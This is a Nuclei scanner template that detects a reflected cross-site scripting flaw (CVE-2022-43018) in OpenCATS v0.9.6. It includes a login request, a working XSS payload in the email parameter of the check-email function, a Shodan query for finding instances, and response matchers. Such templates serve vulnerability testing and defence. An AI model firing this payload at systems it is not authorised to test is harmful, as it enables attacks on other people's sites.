nuclei-templates/cves/2022/CVE-2022-43018.yaml

53 lines
1.4 KiB
YAML

id: CVE-2022-43018
info:
name: OpenCATS v0.9.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.
reference:
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-43018
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-43018
cwe-id: CWE-79
metadata:
shodan-query: title:"OpenCATS"
verified: "true"
tags: cve,cve2022,xss,opencats,authenticated
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>:0'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200